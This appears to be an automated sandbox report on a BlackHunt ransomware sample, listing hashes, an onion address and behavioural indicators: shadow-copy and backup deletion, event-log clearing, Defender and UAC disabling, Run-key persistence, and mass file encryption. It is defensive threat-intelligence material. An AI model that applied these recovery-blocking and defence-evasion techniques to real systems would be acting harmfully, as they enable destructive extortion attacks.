Analysis
-
max time kernel
144s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18-01-2024 23:30
Static task
static1
Behavioral task
behavioral1
Sample
5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe
Resource
win10v2004-20231222-en
General
-
Target
5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe
-
Size
707KB
-
MD5
758ede9d419081f63aa7ba516768d88b
-
SHA1
d607dddeb7edc7a33ab7a3d33a6793cb43474373
-
SHA256
5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435
-
SHA512
ec4581dd5657f8ddc784f02c09d8b8e8f9318e9d6fc82099974d1bb5ed121044320e1d0a9ea06e1e3ffc43df086001199e9b1d505a0de1d11300a5c1dd62306c
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1F8pvnh:6uaTmkZJ+naie5OTamgEoKxLWoNh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 7376 fsutil.exe 17216 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 10080 wevtutil.exe 12416 wevtutil.exe 10768 wevtutil.exe 7724 wevtutil.exe 13900 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 6464 bcdedit.exe 5796 bcdedit.exe 9396 bcdedit.exe 16764 bcdedit.exe -
Renames multiple (3357) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 10088 wbadmin.exe 17200 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" cmd.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\K: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\W: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\O: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\P: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\J: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\N: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\T: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\H: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\L: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\E: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Z: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\R: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\S: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\X: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\B: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\Y: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\U: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\A: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\G: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Q: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\I: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\V: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened (read-only) \??\M: 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pt-br\ui-strings.js 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sk-sk\#BlackHunt_Private.key 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-fr\#BlackHunt_ReadMe.txt 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_ko_135x40.svg 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fi-fi\ui-strings.js 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\vscroll-thumb.png 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\#BlackHunt_ReadMe.txt 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fi-fi\#BlackHunt_Private.key 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nb-no\#BlackHunt_ReadMe.hta 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\#BlackHunt_ReadMe.hta 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_up_hover_18.svg 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files\7-Zip\Lang\sw.txt 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\#BlackHunt_ReadMe.hta 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\#BlackHunt_ReadMe.txt 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\rhp\pages-app-selector.js 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files\VideoLAN\VLC\plugins\spu\#BlackHunt_Private.key 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fontconfig.bfc 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\cryptix.md 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\#BlackHunt_Private.key 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\eu-es\#BlackHunt_ReadMe.hta 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\s_filter_18.svg 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\#BlackHunt_ReadMe.txt 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SendMail.api 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\ui-strings.js 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\#BlackHunt_ReadMe.hta 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ar-ae\#BlackHunt_ReadMe.hta 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\#BlackHunt_ReadMe.hta 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ar-ae\#BlackHunt_ReadMe.txt 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\#BlackHunt_ReadMe.txt 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\#BlackHunt_ReadMe.hta 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\#BlackHunt_ReadMe.hta 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\tr_get.svg 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\el_get.svg 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_zh_CN.properties 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\#BlackHunt_Private.key 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\#BlackHunt_Private.key 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\web_documentcloud_logo.png 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\#BlackHunt_ReadMe.txt 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\hijrah-config-umalqura.properties 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\vlc.mo 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sk-sk\ui-strings.js 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\#BlackHunt_ReadMe.txt 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\collect_feedback\css\#BlackHunt_ReadMe.hta 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\#BlackHunt_ReadMe.txt 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\#BlackHunt_Private.key 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfxswt.jar 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Confirmation2x.png 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files\VideoLAN\VLC\plugins\#BlackHunt_ReadMe.txt 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-fr\ui-strings.js 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\#BlackHunt_Private.key 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\upsell-2x.png 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\es-es\#BlackHunt_Private.key 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\deployment.config 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\eu-es\#BlackHunt_ReadMe.hta 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\root\#BlackHunt_Private.key 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\cs-cz\#BlackHunt_Private.key 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\main.css 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\sample-thumb.png 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ru-ru\#BlackHunt_ReadMe.txt 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sl-si\#BlackHunt_Private.key 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\#BlackHunt_ReadMe.txt 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ja-jp\#BlackHunt_ReadMe.txt 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 11556 13420 WerFault.exe 297 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5152 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 6636 vssadmin.exe 5280 vssadmin.exe 6136 vssadmin.exe 2832 vssadmin.exe 10076 vssadmin.exe 10124 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 16412 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 16500 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe Token: SeRestorePrivilege 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe Token: SeBackupPrivilege 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe Token: SeTakeOwnershipPrivilege 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe Token: SeAuditPrivilege 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe Token: SeSecurityPrivilege 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe Token: SeIncBasePriorityPrivilege 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe Token: SeBackupPrivilege 11504 wbengine.exe Token: SeRestorePrivilege 11504 wbengine.exe Token: SeSecurityPrivilege 11504 wbengine.exe Token: SeBackupPrivilege 10480 vssvc.exe Token: SeRestorePrivilege 10480 vssvc.exe Token: SeAuditPrivilege 10480 vssvc.exe Token: SeSecurityPrivilege 12416 wevtutil.exe Token: SeBackupPrivilege 12416 wevtutil.exe Token: SeSecurityPrivilege 10768 wevtutil.exe Token: SeBackupPrivilege 10768 wevtutil.exe Token: SeSecurityPrivilege 7724 wevtutil.exe Token: SeBackupPrivilege 7724 wevtutil.exe Token: SeSecurityPrivilege 13900 wevtutil.exe Token: SeBackupPrivilege 13900 wevtutil.exe Token: SeSecurityPrivilege 10080 wevtutil.exe Token: SeBackupPrivilege 10080 wevtutil.exe Token: SeDebugPrivilege 16412 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3292 wrote to memory of 3516 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 92 PID 3292 wrote to memory of 3516 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 92 PID 3292 wrote to memory of 2456 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 94 PID 3292 wrote to memory of 2456 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 94 PID 3292 wrote to memory of 776 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 96 PID 3292 wrote to memory of 776 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 96 PID 3292 wrote to memory of 2132 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 98 PID 3292 wrote to memory of 2132 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 98 PID 3292 wrote to memory of 1124 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 100 PID 3292 wrote to memory of 1124 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 100 PID 3292 wrote to memory of 4048 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 102 PID 3292 wrote to memory of 4048 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 102 PID 3516 wrote to memory of 1500 3516 cmd.exe 104 PID 3516 wrote to memory of 1500 3516 cmd.exe 104 PID 2456 wrote to memory of 3652 2456 cmd.exe 103 PID 2456 wrote to memory of 3652 2456 cmd.exe 103 PID 3292 wrote to memory of 4752 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 164 PID 3292 wrote to memory of 4752 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 164 PID 776 wrote to memory of 2260 776 cmd.exe 107 PID 776 wrote to memory of 2260 776 cmd.exe 107 PID 3292 wrote to memory of 2256 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 109 PID 3292 wrote to memory of 2256 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 109 PID 2132 wrote to memory of 4044 2132 cmd.exe 110 PID 2132 wrote to memory of 4044 2132 cmd.exe 110 PID 1124 wrote to memory of 632 1124 cmd.exe 157 PID 1124 wrote to memory of 632 1124 cmd.exe 157 PID 3292 wrote to memory of 3484 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 113 PID 3292 wrote to memory of 3484 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 113 PID 4048 wrote to memory of 1844 4048 cmd.exe 115 PID 4048 wrote to memory of 1844 4048 cmd.exe 115 